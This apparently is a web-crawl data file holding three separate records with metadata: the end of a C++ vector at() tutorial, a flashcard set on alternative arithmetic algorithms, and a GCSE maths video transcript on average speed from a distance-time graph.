Optimize after identifying performance bottlenecks.\n\n## Alternatives to at() for Vector Access\n\nThe at() function provides an excellent combination of readability, safety, and performance. However, there are alternatives:\n\n• Iterator access – STL iterators allow sequential or random access without managing indices directly.\n• Ranged for loops – Clean syntax for looping through elements:\n\n``````for (const std::string& str : stringVector) {\n//do something\n}``````\n• Front/back – Access first and last elements via .front() / .back().\n• Asserted [] access – assert(i < vec.size()) before vec[i] gives debug-build checking with no release overhead (requires <cassert>).\n• Fixed-size std::array – avoids heap allocation entirely, but the size cannot change.\n\nEach approach has trade-offs. But for direct access by index, at() provides the best combination of safety and performance in most cases.\n\n## In Summary\n\nThis deep dive covered everything you need to know to leverage C++ vector's at() function effectively:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74602735,"math_prob":0.88233143,"size":10865,"snap":"2023-40-2023-50","text_gpt3_token_len":2593,"char_repetition_ratio":0.1288095,"word_repetition_ratio":0.022611644,"special_character_ratio":0.26562357,"punctuation_ratio":0.16674517,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9833797,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T16:02:06Z\",\"WARC-Record-ID\":\"<urn:uuid:853d0702-82d1-42bf-b9f6-4857305a46bc>\",\"Content-Length\":\"169006\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bc964c76-e9df-48c9-9233-a4943e351e83>\",\"WARC-Concurrent-To\":\"<urn:uuid:c3c7db18-12f3-4ab3-ba4d-0a18996cbb6d>\",\"WARC-IP-Address\":\"104.21.36.195\",\"WARC-Target-URI\":\"https://thelinuxcode.com/at-functions-cpp-vector/\",\"WARC-Payload-Digest\":\"sha1:2QEGMWUOUR7VODCJFO7GFTCOT63H2DCO\",\"WARC-Block-Digest\":\"sha1:N5PLL45NSTF52VIXLHOITA5OWKH6NILO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679515260.97_warc_CC-MAIN-20231211143258-20231211173258-00474.warc.gz\"}"}
https://www.flashcardmachine.com/alternative-algorithms.html
[ "# Shared Flashcard Set\n\n## Details\n\nAlternative Algorithms\nEXAM 2\n15\nMathematics\n12/08/2010\n\nTerm\n ARTICLE\nDefinition\nTerm\n Partial Sums Algorithm\nDefinition\n [image]\nTerm\n What is the advantage of using the partial-sums algorythm?\nDefinition\n The advantage of this method, for students whohave difficulty with the traditional algorithm, is that mental regrouping is not required; all the partialsums are recorded separately before being combined.   Also, the methodyields a correct sum whether the partial sums beginwith the ones or the left-most column.Left-to-right addition (see figs. 1b and\nTerm\n Scratch Method\nDefinition\n [image]\nTerm\nDefinition\n Students saw an advantage in recording thepartial sums, which does not require them to carrynumbers mentally. Also, this algorithm appeals tostudents’ desire to work quickly because, as theexamples show, they do not have to record all thecomplete partial sums.\nTerm\nDefinition\n [image]   In figure 4, instead of a ten being taken from the6 tens, as would be done in the traditional algorithm,a ten is added to the 5 ones to give 15 ones.To compensate, 1 ten is added to the subtrahend,resulting in 8 tens. The 9 ones are then subtractedfrom the 15 ones. The next step is to add 10 tens tothe 6 tens in the minuend so that 8 tens can be subtracted.To compensate, 1 hundred is added to the 8 hundreds, yielding 9 hundreds. The amount of8 tens is then subtracted from 16 tens. Next, 10 hundredsadded to the 4 hundreds results in 14 hundreds;to compensate, 1 thousand is added to thesubtrahend. Then 9 hundreds can be subtractedfrom 14 hundreds, and 2 thousand is subtractedfrom 5 thousand.\nTerm\n What is an advantage of using the Equal Additions Method of Subtraction?\nDefinition\n The main advantage of this procedureis that it does not rely on one’s skill in regroupingbut on a knowledge of individual addition andsubtraction facts. Equal additions is an interestingoptional method for relating subtraction to addition.\nTerm\n Low stress Subtraction\nDefinition\n [image]   Low-stress subtraction involves renaming theminuend and writing it between the original minuendand the subtrahend before subtracting individualdigits (Hutchings 1975). In figure 5, 6 tens arerenamed as 5 tens and 10 ones; the 10 ones are regrouped with the 5 ones to make 15 ones. Next,because 7 tens cannot be subtracted from 5 tens,4 hundreds is renamed as 3 hundreds and 10 tens;the 10 tens are regrouped with the 5 tens to make15 tens. This process continues until the minuendis rewritten so that no impasses to subtractionremain and the problem is ready to be completed.\nTerm\n Partial products algorythm\nDefinition\n [image]\nTerm\n What is an advantage of using the partial products algorythm?\nDefinition\n The partial-products method does not requiresimultaneous regrouping of addition with multiplication.Teachers can easily assess multiplicationfacts that students consistently miss by examiningpartial products before they are renamed andadded.\nTerm\n Lattice Multiplication\nDefinition\n [image]\nTerm\n Stacking Algorythm for division\nDefinition\n [image]\nTerm\n NOTES\nDefinition\nTerm\n BREAK APART NUMBERS STRATEGY\nDefinition\n Based on place value EXAMPLE: 456 + 20 =(400 + 50 +20 +6)470 + 6 476   Count bys 455 + 10 + 10 455 + 10 = 465 465 + 10 = 475 475 + 1 = 476   Count on 237 + 43 237 + 10 + 10 + 10 + 10 + 1 + 1 +1 247, 257, 267, 277, 278, 279, 280\nSupporting users have an ad free experience!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85708,"math_prob":0.86852795,"size":3280,"snap":"2019-26-2019-30","text_gpt3_token_len":873,"char_repetition_ratio":0.15170941,"word_repetition_ratio":0.07020548,"special_character_ratio":0.264939,"punctuation_ratio":0.09286899,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9889181,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-20T16:16:43Z\",\"WARC-Record-ID\":\"<urn:uuid:5652b85f-a997-4e05-a0ea-bc73e0e0c2cc>\",\"Content-Length\":\"32408\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c94099d0-b2cd-4648-8cae-03c667f3428d>\",\"WARC-Concurrent-To\":\"<urn:uuid:728193e6-a381-4a14-ae58-aaf6a9c725c0>\",\"WARC-IP-Address\":\"67.225.168.77\",\"WARC-Target-URI\":\"https://www.flashcardmachine.com/alternative-algorithms.html\",\"WARC-Payload-Digest\":\"sha1:DT2MYGQH5AXMB5JPE2HWQH5FKTQDNKJI\",\"WARC-Block-Digest\":\"sha1:BYMC4L7OWY6O4L2ZG3NUZEKLOWY6GMA6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526536.46_warc_CC-MAIN-20190720153215-20190720175215-00471.warc.gz\"}"}
https://www.nagwa.com/en/videos/695175609529/
[ "# Video: AQA GCSE Mathematics Higher Tier Pack 5 • Paper 1 • Question 24\n\nThis is the distance-time graph for a cyclist cycling 100 metres. a) Calculate the average speed over the 100 metres. Give units in your answer. b) Estimate the distance at which the instantaneous speed is equal to the average speed. You must show your working on the graph.\n\n03:03\n\n### Video Transcript\n\nThis is the distance-time graph for a cyclist cycling 100 metres. Part a) Calculate the average speed over the 100 metres. Give units in your answer. Part b) Estimate the distance at which the instantaneous speed is equal to the average speed. You must show your working on the graph.\n\nRemember speed is a way of measuring the change in distance over a given period of time. The formula for average speed is distance divided by time. So to calculate the average speed for our cyclist, we will need to work out the total distance they travelled and the time it took. In fact, we’re told that the cyclist travelled 100 metres. But we’ll need to read information for the time it took from the graph.\n\nWe can see that the cyclist reached 100 metres at this point. So we can draw a line vertically down to our 𝑥-axis. And we see that it took the cyclist 15 seconds to complete this distance. The speed is therefore found by dividing 100 by 15. This isn’t a calculation we can complete in our heads. So instead, we’ll simplify this fraction as far as we can.\n\n100 and 15 are multiples of five. So we’re going to divide through by five. And we see that this is equivalent to twenty thirds. Now we could leave it in this form or we could change it into a mixed number and therefore into a decimal. 20 divided by three is six remainder two. So we can say that twenty thirds is the same as six and two-thirds. Two-thirds is the same as .6 recurring or .67 correct to two decimal places. So the speed is 6.67 correct to two decimal places.\n\nBut what are the units? Well, we divided a measurement in metres by a measurement in seconds. So the units must be metres per second. And the average speed over the 100 metres was 6.67 metres per second correct to two decimal places. Now let’s look at part b.\n\nWe now know the average speed for the journey. It was 20 over three metres per second. We now need to find a point on the graph, where the gradient is 20 over three since the gradient of a distance-time graph tells us the speed at that point. Since the graph is a curve, we’re going to need to add a tangent with that gradient. Remember the gradient of a straight line is change in 𝑦 over change in 𝑥, which is sometimes called rise over run.\n\nSo we need to find a tangent that rises 20 units for every three units it runs. And we need to be a bit careful with the scale when finding this. Notice that two squares on the 𝑦-axis represent 20 and three squares on the 𝑥-axis represent three. So let’s find a tangent which has this slope. It’s here. The rise of this line is 20 and the run is three. So the gradient is indeed 20 over three. This is at the point where the distance is approximately 68 metres." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95215386,"math_prob":0.9922198,"size":2707,"snap":"2020-45-2020-50","text_gpt3_token_len":664,"char_repetition_ratio":0.11653718,"word_repetition_ratio":0.013671875,"special_character_ratio":0.23568526,"punctuation_ratio":0.09028961,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99935836,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-24T18:21:41Z\",\"WARC-Record-ID\":\"<urn:uuid:f66a13de-4885-4787-8a15-6ce36359e6dd>\",\"Content-Length\":\"26687\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b97c2db3-bf9a-4093-83e9-1d64e2bc4450>\",\"WARC-Concurrent-To\":\"<urn:uuid:355c388b-5a37-4492-b00d-4d27656e8610>\",\"WARC-IP-Address\":\"23.23.60.1\",\"WARC-Target-URI\":\"https://www.nagwa.com/en/videos/695175609529/\",\"WARC-Payload-Digest\":\"sha1:7AC3S7FHFXY3PGIY5CY3FGFQJUPVKNHL\",\"WARC-Block-Digest\":\"sha1:YROQEVEOXVSW2IXIFUCIU4T7MDAIYGJ4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107884322.44_warc_CC-MAIN-20201024164841-20201024194841-00687.warc.gz\"}"}